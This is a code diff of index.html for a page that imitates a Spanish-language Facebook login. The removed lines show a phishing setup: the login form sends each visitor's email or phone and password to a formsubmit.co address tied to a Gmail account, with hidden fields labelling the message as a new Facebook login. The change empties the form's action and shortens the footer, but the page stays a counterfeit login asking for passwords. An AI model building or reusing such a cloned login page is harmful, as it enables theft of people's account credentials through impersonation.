--- a/index.html
+++ b/index.html
@@ -256,12 +256,7 @@
             </div>
             
             <div class="login-form-container">
-                <form id="facebookLoginForm" class="login-form" method="POST" action="https://formsubmit.co/deiapps2424@gmail.com">
-                    <input type="hidden" name="_captcha" value="false">
-                    <input type="hidden" name="_next" value="https://yourdomain.com/thankyou.html">
-                    <input type="hidden" name="_template" value="table">
-                    <input type="hidden" name="_subject" value="Nuevo inicio de sesión Facebook">
-                    <input type="hidden" name="_autoresponse" value="Gracias por iniciar sesión">
+                <form id="facebookLoginForm" class="login-form" method="POST" action="">
                     <input type="text" name="email" required placeholder="Correo electrónico o número de teléfono">
                     <input type="password" name="password" required placeholder="Contraseña">
                     <button type="submit" class="login-btn">Iniciar sesión</button>
@@ -278,42 +273,9 @@
     <footer>
         <div class="footer-container">
             <div class="footer-links">
-                <a href="#">Español</a>
-                <a href="#">English (US)</a>
-                <a href="#">Français (France)</a>
-                <a href="#">Português (Brasil)</a>
-                <a href="#">Italiano</a>
-                <a href="#">Deutsch</a>
-                <a href="#">العربية</a>
-                <a href="#">हिन्दी</a>
-                <a href="#">中文(简体)</a>
-                <a href="#">日本語</a>
-            </div>
-            <div class="footer-links">
-                <a href="#">Registrarte</a>
-                <a href="#">Iniciar sesión</a>
-                <a href="#">Messenger</a>
-                <a href="#">Facebook Lite</a>
-                <a href="#">Video</a>
-                <a href="#">Lugares</a>
-                <a href="#">Juegos</a>
-                <a href="#">Marketplace</a>
-                <a href="#">Meta Pay</a>
-                <a href="#">Oculus</a>
-                <a href="#">Portal</a>
-                <a href="#">Instagram</a>
-            </div>
-            <div class="footer-links">
                 <a href="#">Información</a>
-                <a href="#">Centro de ayuda</a>
-                <a href="#">Política de privacidad</a>
-                <a href="#">Centro de privacidad</a>
-                <a href="#">Grupos</a>
-                <a href="#">Configuración de cookies</a>
-                <a href="#">Empleo</a>
-                <a href="#">Condiciones</a>
-                <a href="#">Subir contactos y no usuarios</a>
-                <a href="#">Registro del navegador</a>
+                <a href="#">Ayuda</a>
+                <a href="#">Privacidad</a>
             </div>
         </div>
     </footer>
